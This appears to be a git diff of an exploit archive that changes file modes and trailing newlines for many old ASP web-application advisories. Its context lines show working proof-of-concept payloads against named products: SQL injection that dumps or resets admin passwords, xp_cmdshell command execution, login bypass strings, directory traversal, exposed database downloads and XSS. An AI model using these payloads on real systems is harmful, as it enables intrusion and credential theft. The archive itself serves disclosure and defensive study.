Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon \ No newline at end of file diff --git a/platforms/asp/webapps/1571.htm b/platforms/asp/webapps/1571.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15777.txt b/platforms/asp/webapps/15777.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15784.txt b/platforms/asp/webapps/15784.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/16178.txt b/platforms/asp/webapps/16178.txt old mode 100755 new mode 100644 index d560430b3..0dad792ad --- a/platforms/asp/webapps/16178.txt +++ b/platforms/asp/webapps/16178.txt @@ -10,4 +10,4 @@ Attackers can use a browser to exploit this issue. The following example URI is available: -http://www.example.com/resulttype.asp?probe=[Code] \ No newline at end of file +http://www.example.com/resulttype.asp?probe=[Code] \ No newline at end of file diff --git a/platforms/asp/webapps/16179.txt b/platforms/asp/webapps/16179.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/16205.txt b/platforms/asp/webapps/16205.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/16241.txt b/platforms/asp/webapps/16241.txt old mode 100755 new mode 100644 index dfcc79b5e..631db957c --- a/platforms/asp/webapps/16241.txt +++ b/platforms/asp/webapps/16241.txt @@ -23,6 +23,4 @@ http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE POC --- http://www.site.com/news/news.asp?id=256 and 1=1 TRUE -http://www.site.com/news/news.asp?id=256 and 1=0 FALSE - - \ No newline at end of file +http://www.site.com/news/news.asp?id=256 and 1=0 FALSE \ No newline at end of file diff --git a/platforms/asp/webapps/16941.txt b/platforms/asp/webapps/16941.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/16953.txt b/platforms/asp/webapps/16953.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/16955.txt b/platforms/asp/webapps/16955.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/16962.txt b/platforms/asp/webapps/16962.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/16975.txt b/platforms/asp/webapps/16975.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17011.txt b/platforms/asp/webapps/17011.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17015.txt b/platforms/asp/webapps/17015.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17016.txt b/platforms/asp/webapps/17016.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17036.txt b/platforms/asp/webapps/17036.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17081.txt b/platforms/asp/webapps/17081.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1714.txt b/platforms/asp/webapps/1714.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17176.txt b/platforms/asp/webapps/17176.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17228.txt b/platforms/asp/webapps/17228.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17242.txt b/platforms/asp/webapps/17242.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17375.txt b/platforms/asp/webapps/17375.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17472.txt b/platforms/asp/webapps/17472.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17475.txt b/platforms/asp/webapps/17475.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17478.txt b/platforms/asp/webapps/17478.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17479.txt b/platforms/asp/webapps/17479.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17480.txt b/platforms/asp/webapps/17480.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17481.txt b/platforms/asp/webapps/17481.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17482.txt b/platforms/asp/webapps/17482.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17493.txt b/platforms/asp/webapps/17493.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1759.txt b/platforms/asp/webapps/1759.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17711.txt b/platforms/asp/webapps/17711.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17733.txt b/platforms/asp/webapps/17733.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17900.txt b/platforms/asp/webapps/17900.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/17921.txt b/platforms/asp/webapps/17921.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18009.txt b/platforms/asp/webapps/18009.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1807.txt b/platforms/asp/webapps/1807.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1833.txt b/platforms/asp/webapps/1833.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1834.asp b/platforms/asp/webapps/1834.asp old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1836.txt b/platforms/asp/webapps/1836.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18394.txt b/platforms/asp/webapps/18394.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18395.txt b/platforms/asp/webapps/18395.txt old mode 100755 new mode 100644 index b270b669f..59431ff9c --- a/platforms/asp/webapps/18395.txt +++ b/platforms/asp/webapps/18395.txt @@ -16,4 +16,4 @@ # # [Get Database Name] # http://server/default.aspx?page=Document&app=Documents&docId=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1 -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/asp/webapps/1840.txt b/platforms/asp/webapps/1840.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18405.txt b/platforms/asp/webapps/18405.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18447.txt b/platforms/asp/webapps/18447.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1845.txt b/platforms/asp/webapps/1845.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1849.htm b/platforms/asp/webapps/1849.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1850.htm b/platforms/asp/webapps/1850.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18566.txt b/platforms/asp/webapps/18566.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1859.htm b/platforms/asp/webapps/1859.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18651.txt b/platforms/asp/webapps/18651.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1873.txt b/platforms/asp/webapps/1873.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18802.txt b/platforms/asp/webapps/18802.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1884.htm b/platforms/asp/webapps/1884.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/18840.txt b/platforms/asp/webapps/18840.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1893.txt b/platforms/asp/webapps/1893.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1900.txt b/platforms/asp/webapps/1900.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1930.txt b/platforms/asp/webapps/1930.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1931.txt b/platforms/asp/webapps/1931.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/19394.txt b/platforms/asp/webapps/19394.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1987.txt b/platforms/asp/webapps/1987.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/20035.js b/platforms/asp/webapps/20035.js old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/20864.txt b/platforms/asp/webapps/20864.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/20987.txt b/platforms/asp/webapps/20987.txt old mode 100755 new mode 100644 index e7f94c02f..f2e536642 --- a/platforms/asp/webapps/20987.txt +++ b/platforms/asp/webapps/20987.txt @@ -4,4 +4,4 @@ Citrix Nfuse is an application portal server meant to provide the functionality It has been reported that a remote attacker can learn the location of the webroot simply by submitting a request to the launcher application without specifying the additional required information. This has been reported to not be reliably replicable. -http://target/path/launch.asp? \ No newline at end of file +http://target/path/launch.asp? \ No newline at end of file diff --git a/platforms/asp/webapps/21085.txt b/platforms/asp/webapps/21085.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21272.txt b/platforms/asp/webapps/21272.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21308.txt b/platforms/asp/webapps/21308.txt old mode 100755 new mode 100644 index e179c3fcb..a9c16e779 --- a/platforms/asp/webapps/21308.txt +++ b/platforms/asp/webapps/21308.txt @@ -9,4 +9,4 @@ Snitz Forums 2000 allows users to include images in forum messages using image t It is possible to inject arbitrary script code into forum messages via these image tags. Script code will be executed in the browser of the user viewing the forum message, in the context of the website running the vulnerable software. This may allow an attacker to steal cookie-based authentication credentials. -[img]javasCript:alert('Hello world.')[/img] \ No newline at end of file +[img]javasCript:alert('Hello world.')[/img] \ No newline at end of file diff --git a/platforms/asp/webapps/2138.txt b/platforms/asp/webapps/2138.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21400.txt b/platforms/asp/webapps/21400.txt old mode 100755 new mode 100644 index ce027dde1..01a7ee331 --- a/platforms/asp/webapps/21400.txt +++ b/platforms/asp/webapps/21400.txt @@ -19,4 +19,4 @@ Use this link to view the vulnerability: /members.asp?mode=search&M_NAME=XXXX% 25')%20UNION%20SELECT%20MEMBER_ID,% 20M_STATUS,%20M_NAME%20%2B%20'/'%20% -2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,% \ No newline at end of file +2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,% \ No newline at end of file diff --git a/platforms/asp/webapps/21434.txt b/platforms/asp/webapps/21434.txt old mode 100755 new mode 100644 index 5be5dacca..8c0b70afb --- a/platforms/asp/webapps/21434.txt +++ b/platforms/asp/webapps/21434.txt @@ -7,4 +7,4 @@ Under some circumstances, it may be possible for a remote user to gain unauthori It is possible for remote attackers to corrupt the logic of queries such that a successful login will occur regardless of the supplied password. User: admin (this selects the first index from the table) -Password: ' OR ''=' \ No newline at end of file +Password: ' OR ''=' \ No newline at end of file diff --git a/platforms/asp/webapps/21455.txt b/platforms/asp/webapps/21455.txt old mode 100755 new mode 100644 index c9a3858e9..b873062e0 --- a/platforms/asp/webapps/21455.txt +++ b/platforms/asp/webapps/21455.txt @@ -5,4 +5,4 @@ Hosting Controller is an application which consolidates all hosting tasks into o The DSNManager script does not sufficiently filter dot-dot-slash (../) sequences from URL parameters, making it prone to directory traversal attacks. An attacker can exploit this condition to disclose the contents of arbitrary web-readable files or potentially add a DSN (Data Source Number) to an arbitrary directory. http://target/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\targ -et\target.com\db\..\..\..\..\ \ No newline at end of file +et\target.com\db\..\..\..\..\ \ No newline at end of file diff --git a/platforms/asp/webapps/21457.txt b/platforms/asp/webapps/21457.txt old mode 100755 new mode 100644 index f77485f3d..3537eead2 --- a/platforms/asp/webapps/21457.txt +++ b/platforms/asp/webapps/21457.txt @@ -6,4 +6,4 @@ The Import Root Directory (imp_rootdir.asp) script does not force an authenticat This may enable a remote attacker to execute arbitrary commands on the underlying system, eventually leading to a full compromise. -http://target/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\ \ No newline at end of file +http://target/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\ \ No newline at end of file diff --git a/platforms/asp/webapps/21464.txt b/platforms/asp/webapps/21464.txt old mode 100755 new mode 100644 index f0c70c02e..a80f68be9 --- a/platforms/asp/webapps/21464.txt +++ b/platforms/asp/webapps/21464.txt @@ -4,4 +4,4 @@ Hosting Controller is an application which consolidates all hosting tasks into o The 'browse.asp' script is prone to an issue which may allow a remote attacker to view the contents of arbitrary files and directories. The attacker must provide a malicious value as a URL parameter in a request for the affected script, which will be read with the privileges of the web server process. -http://target/admin/browse.asp?FilePath=c:\&Opt=2&level=0 \ No newline at end of file +http://target/admin/browse.asp?FilePath=c:\&Opt=2&level=0 \ No newline at end of file diff --git a/platforms/asp/webapps/2150.txt b/platforms/asp/webapps/2150.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21702.txt b/platforms/asp/webapps/21702.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21766.txt b/platforms/asp/webapps/21766.txt old mode 100755 new mode 100644 index 46df418e9..a1c0dbc57 --- a/platforms/asp/webapps/21766.txt +++ b/platforms/asp/webapps/21766.txt @@ -4,4 +4,4 @@ FactoSystem Weblog is a freely available, open source software package for weblo FactoSystem does not adequately filter special characters from requests. Because of this, it may be possible for a remote user to submit a request containing encoded special characters and SQL, and execute arbitrary commands. This could lead to execution of SQL commands in the security context of web database user. -http://www.example.com/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B-- \ No newline at end of file +http://www.example.com/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B-- \ No newline at end of file diff --git a/platforms/asp/webapps/2186.txt b/platforms/asp/webapps/2186.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21914.txt b/platforms/asp/webapps/21914.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21920.txt b/platforms/asp/webapps/21920.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21924.txt b/platforms/asp/webapps/21924.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/21925.txt b/platforms/asp/webapps/21925.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2228.txt b/platforms/asp/webapps/2228.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2230.txt b/platforms/asp/webapps/2230.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22357.txt b/platforms/asp/webapps/22357.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22436.txt b/platforms/asp/webapps/22436.txt old mode 100755 new mode 100644 index 82d736d8a..0fb594045 --- a/platforms/asp/webapps/22436.txt +++ b/platforms/asp/webapps/22436.txt @@ -6,4 +6,4 @@ It may be possible for a remote attacker to create a malicious link containing s This may allow for theft of cookie-based authentication credentials and other attacks. -http://www.example.com/myguestBk/add1.asp?name=Name&subject=Subj&email=M@IL&message= \ No newline at end of file +http://www.example.com/myguestBk/add1.asp?name=Name&subject=Subj&email=M@IL&message= \ No newline at end of file diff --git a/platforms/asp/webapps/22437.txt b/platforms/asp/webapps/22437.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22484.txt b/platforms/asp/webapps/22484.txt old mode 100755 new mode 100644 index ad6ac2078..43178fccf --- a/platforms/asp/webapps/22484.txt +++ b/platforms/asp/webapps/22484.txt @@ -6,4 +6,4 @@ An attacker may make a request for and download the underlying Access database f Information collected in this way may be used to aid in further attacks against the system. -http://www.example.com/guestbook/admin/o12guest.mdb \ No newline at end of file +http://www.example.com/guestbook/admin/o12guest.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/22487.txt b/platforms/asp/webapps/22487.txt old mode 100755 new mode 100644 index 2cac66d1d..f0b6e877b --- a/platforms/asp/webapps/22487.txt +++ b/platforms/asp/webapps/22487.txt @@ -8,4 +8,4 @@ Information collected in this way may be used to aid in further attacks against It should be noted that although this vulnerability has been reported to affect Site News version 3.06, previous versions might also be affected. -http://www.example.com/news/news.mdb \ No newline at end of file +http://www.example.com/news/news.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/22507.txt b/platforms/asp/webapps/22507.txt old mode 100755 new mode 100644 index 20c48d40c..805b2d57b --- a/platforms/asp/webapps/22507.txt +++ b/platforms/asp/webapps/22507.txt @@ -8,4 +8,4 @@ Information collected in this way may be used to aid in further attacks against It should be noted that all versions of Web Wiz Forums have been reported prone to this vulnerability. -http://www.example.com/forum/admin/wwforum.mdb \ No newline at end of file +http://www.example.com/forum/admin/wwforum.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/22513.txt b/platforms/asp/webapps/22513.txt old mode 100755 new mode 100644 index 4645c30bd..a75bfc91c --- a/platforms/asp/webapps/22513.txt +++ b/platforms/asp/webapps/22513.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7390/info MPCSoftWeb does not sufficiently secure the database file. It is possible for remote attackers to request the database file and gain access to sensitive information such as administrative credentials for the guestbook. -http://www.example.com/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb \ No newline at end of file +http://www.example.com/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/22529.txt b/platforms/asp/webapps/22529.txt old mode 100755 new mode 100644 index e1fdd061d..02907c977 --- a/platforms/asp/webapps/22529.txt +++ b/platforms/asp/webapps/22529.txt @@ -9,4 +9,4 @@ The condition is reportedly due to insufficient sanitization of externally suppl Log into a vulnerable forum using the following password: 'or''=' -A username is not required. \ No newline at end of file +A username is not required. \ No newline at end of file diff --git a/platforms/asp/webapps/22554.txt b/platforms/asp/webapps/22554.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22555.txt b/platforms/asp/webapps/22555.txt old mode 100755 new mode 100644 index 18410d29a..39dd5ea01 --- a/platforms/asp/webapps/22555.txt +++ b/platforms/asp/webapps/22555.txt @@ -6,4 +6,4 @@ This vulnerability may be the result of inadequate sanitization of user-supplied http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'-- -http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domain\attacker'-- \ No newline at end of file +http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domain\attacker'-- \ No newline at end of file diff --git a/platforms/asp/webapps/22639.txt b/platforms/asp/webapps/22639.txt old mode 100755 new mode 100644 index 02755fb10..5a3630c52 --- a/platforms/asp/webapps/22639.txt +++ b/platforms/asp/webapps/22639.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the IISProtect server, a http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste r..xp_cmdshell'ping%2010.10.10.11';-- -This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system. \ No newline at end of file +This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system. \ No newline at end of file diff --git a/platforms/asp/webapps/22673.txt b/platforms/asp/webapps/22673.txt old mode 100755 new mode 100644 index 3da403ac4..01916dce4 --- a/platforms/asp/webapps/22673.txt +++ b/platforms/asp/webapps/22673.txt @@ -19,4 +19,4 @@ Download the database (users and password): Usually, the database location can be found and download it from: http://www.target.com/database/philboard.mdb or -http://www.target.com/forum/database/philboard.mdb \ No newline at end of file +http://www.target.com/forum/database/philboard.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/22697.asp b/platforms/asp/webapps/22697.asp old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22724.txt b/platforms/asp/webapps/22724.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22730.txt b/platforms/asp/webapps/22730.txt old mode 100755 new mode 100644 index 2c42d1289..a5d7b60be --- a/platforms/asp/webapps/22730.txt +++ b/platforms/asp/webapps/22730.txt @@ -4,4 +4,4 @@ Mailtraq is vulnerable to cross-site scripting attacks. The vulnerability exists An attacker can exploit this vulnerability by manipulating the 'cfolder' URI parameter to the browse.asp script and sending a link to a victim user. If this link is visited, the attacker-supplied code may be rendered in the browser of the user who visit the malicious link. -http://www.example.org/browse.asp? \ No newline at end of file +http://www.example.org/browse.asp? \ No newline at end of file diff --git a/platforms/asp/webapps/22731.txt b/platforms/asp/webapps/22731.txt old mode 100755 new mode 100644 index c810cd5b6..f0d32bfee --- a/platforms/asp/webapps/22731.txt +++ b/platforms/asp/webapps/22731.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Mailtraq that may result in the disclosure The vulnerability exists due to insufficient sanitization of HTTP requests. Specifically, a request for non-existent resources will result in an error message being returned that includes path information. -http://10.10.10.1/browse.asp* \ No newline at end of file +http://10.10.10.1/browse.asp* \ No newline at end of file diff --git a/platforms/asp/webapps/22744.txt b/platforms/asp/webapps/22744.txt old mode 100755 new mode 100644 index 0cded5522..b39733b28 --- a/platforms/asp/webapps/22744.txt +++ b/platforms/asp/webapps/22744.txt @@ -5,4 +5,4 @@ Synkron.web is prone to HTML injection attacks. The vulnerability exists in the Exploitation could allow for attacks that steal cookie-based authentication credentials. http://www.example.net/sw000.asp?SearchCacheId=xx\ -&SearchPageNumberII=1&SearchParaId=y&SearchParaType=zzz \ No newline at end of file +&SearchPageNumberII=1&SearchParaId=y&SearchParaType=zzz \ No newline at end of file diff --git a/platforms/asp/webapps/22746.txt b/platforms/asp/webapps/22746.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22747.txt b/platforms/asp/webapps/22747.txt old mode 100755 new mode 100644 index 84ee00287..7dfa58150 --- a/platforms/asp/webapps/22747.txt +++ b/platforms/asp/webapps/22747.txt @@ -14,4 +14,4 @@ MaxWebPortal has been reported prone to a database disclosure vulnerability. Max MaxWebPortal 'password.asp' has been reported prone to a password-reset vulnerability. It has been reported that by requesting a forgotten password, an attacker may save the 'password reset' page offline. By modifying the member id in the script the attacker may reset arbitrary account passwords. -http://www.example.com/database/db2000.mdb \ No newline at end of file +http://www.example.com/database/db2000.mdb \ No newline at end of file diff --git a/platforms/asp/webapps/22778.txt b/platforms/asp/webapps/22778.txt old mode 100755 new mode 100644 index 42fd6374f..a5caa43dc --- a/platforms/asp/webapps/22778.txt +++ b/platforms/asp/webapps/22778.txt @@ -6,4 +6,4 @@ Exploitation may allow theft of cookie-based authentication credentials or other This issue was reported in Snitz Forums 3.4.0.3, other versions might also be affected. -http://www.example.com/search.asp?Search="><script>alert()</script> \ No newline at end of file +http://www.example.com/search.asp?Search="><script>alert()</script> \ No newline at end of file diff --git a/platforms/asp/webapps/22864.txt b/platforms/asp/webapps/22864.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22865.txt b/platforms/asp/webapps/22865.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22866.txt b/platforms/asp/webapps/22866.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22868.txt b/platforms/asp/webapps/22868.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2287.txt b/platforms/asp/webapps/2287.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22885.asp b/platforms/asp/webapps/22885.asp old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22895.txt b/platforms/asp/webapps/22895.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22921.txt b/platforms/asp/webapps/22921.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2294.txt b/platforms/asp/webapps/2294.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2296.txt b/platforms/asp/webapps/2296.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/22992.txt b/platforms/asp/webapps/22992.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23005.txt b/platforms/asp/webapps/23005.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23032.txt b/platforms/asp/webapps/23032.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23033.txt b/platforms/asp/webapps/23033.txt old mode 100755 new mode 100644 index 4e770a2a3..9b5f9d4da --- a/platforms/asp/webapps/23033.txt +++ b/platforms/asp/webapps/23033.txt @@ -4,4 +4,4 @@ It has been reported that a html injection issue exists in the Clickcess ChitCha This vulerability may lead to cookie-based credential theft. -Topic title: \ No newline at end of file +Topic title: \ No newline at end of file diff --git a/platforms/asp/webapps/23035.txt b/platforms/asp/webapps/23035.txt old mode 100755 new mode 100644 index 90cec2abc..e19fcafc3 --- a/platforms/asp/webapps/23035.txt +++ b/platforms/asp/webapps/23035.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8426/info A vulnerability has been reported for Poster.version:two. The problem occurs due to the application failing to lock the 'setup' variable after initialization. As a result, an attacker may access this variable to add additional adminstrator users to the forum. This may effectively allow for the theft or modification of sensitive information. -http://www.example.com/poster/?go=setup_submit&un=DarkKnight&pw=123456&em=EMAIL&submit=submit \ No newline at end of file +http://www.example.com/poster/?go=setup_submit&un=DarkKnight&pw=123456&em=EMAIL&submit=submit \ No newline at end of file diff --git a/platforms/asp/webapps/23055.txt b/platforms/asp/webapps/23055.txt old mode 100755 new mode 100644 index e0915c25c..5f539ab5d --- a/platforms/asp/webapps/23055.txt +++ b/platforms/asp/webapps/23055.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8480/info IdealBB is prone to an HTML injection vulnerability. This could permit remote attackers to inject malicious HTML and script code into board messages. The attacker's code may be rendered in the web browser of the user viewing the malicious message. -Google \ No newline at end of file +Google \ No newline at end of file diff --git a/platforms/asp/webapps/2306.txt b/platforms/asp/webapps/2306.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23120.txt b/platforms/asp/webapps/23120.txt old mode 100755 new mode 100644 index 32f17e65b..1c04ba981 --- a/platforms/asp/webapps/23120.txt +++ b/platforms/asp/webapps/23120.txt @@ -6,4 +6,4 @@ Successful exploitation of this vulnerability may allow an attacker to steal coo - \ No newline at end of file + \ No newline at end of file diff --git a/platforms/asp/webapps/23195.txt b/platforms/asp/webapps/23195.txt old mode 100755 new mode 100644 index af23ac579..b162c0828 --- a/platforms/asp/webapps/23195.txt +++ b/platforms/asp/webapps/23195.txt @@ -4,4 +4,4 @@ A-Cart has been reported prone to a cross-site scripting vulnerability. The issu An attacker could exploit this condition to render arbitrary HTML in the browser of a victim, stealing cookie authentication credentials or performing other nefarious acts. -http://www.example.com/acartpath/signin.asp?msg= \ No newline at end of file +http://www.example.com/acartpath/signin.asp?msg= \ No newline at end of file diff --git a/platforms/asp/webapps/23326.txt b/platforms/asp/webapps/23326.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23331.txt b/platforms/asp/webapps/23331.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/23335.txt b/platforms/asp/webapps/23335.txt old mode 100755 new mode 100644 index 5e9fb8571..0822d33e9 --- a/platforms/asp/webapps/23335.txt +++ b/platforms/asp/webapps/23335.txt @@ -4,4 +4,4 @@ It has been reported that VieNuke VieBoard may be prone to a SQL injection vulne A malicious user may influence database queries in order to view or modify sensitive information potentially compromising the software or the database. -http://www.example.com/vie/viewtopic.asp?forumid=48&id=2736' \ No newline at end of file +http://www.example.com/vie/viewtopic.asp?forumid=48&id=2736' \ No newline at end of file diff --git a/platforms/asp/webapps/23407.txt b/platforms/asp/webapps/23407.txt old mode 100755 new mode 100644 index 6eca55746..06192432e --- a/platforms/asp/webapps/23407.txt +++ b/platforms/asp/webapps/23407.txt @@ -12,4 +12,4 @@ fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6 This code changes the administrator password: Keyword=&category=5); update tbluser set fldpassword='edsaqw' where -fldusername='admin'--&SubCategory=All&action.x=33&action.y=6 \ No newline at end of file +fldusername='admin'--&SubCategory=All&action.x=33&action.y=6 \ No newline at end of file diff --git a/platforms/asp/webapps/23408.txt b/platforms/asp/webapps/23408.txt old mode 100755 new mode 100644 index 25f58130f..42a31d03e --- a/platforms/asp/webapps/23408.txt +++ b/platforms/asp/webapps/23408.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/9134/info It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopdisplayproducts.asp' script of the software. http://www.example.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20 -like%20'a%25'-- \ No newline at end of file +like%20'a%25'-- \ No newline at end of file diff --git a/platforms/asp/webapps/23415.txt b/platforms/asp/webapps/23415.txt old mode 100755 new mode 100644 index 67c7a9db8..b1e86fc6a --- a/platforms/asp/webapps/23415.txt +++ b/platforms/asp/webapps/23415.txt @@ -10,4 +10,4 @@ http://www.example.com/vpasp/shopdisplayproducts.asp?id=5&cat= -http://www.example.com/vpasp/shopdisplayproducts.asp?id=5&cat=Username:
Password:
\ No newline at end of file +http://www.example.com/vpasp/shopdisplayproducts.asp?id=5&cat=Username:
Password:
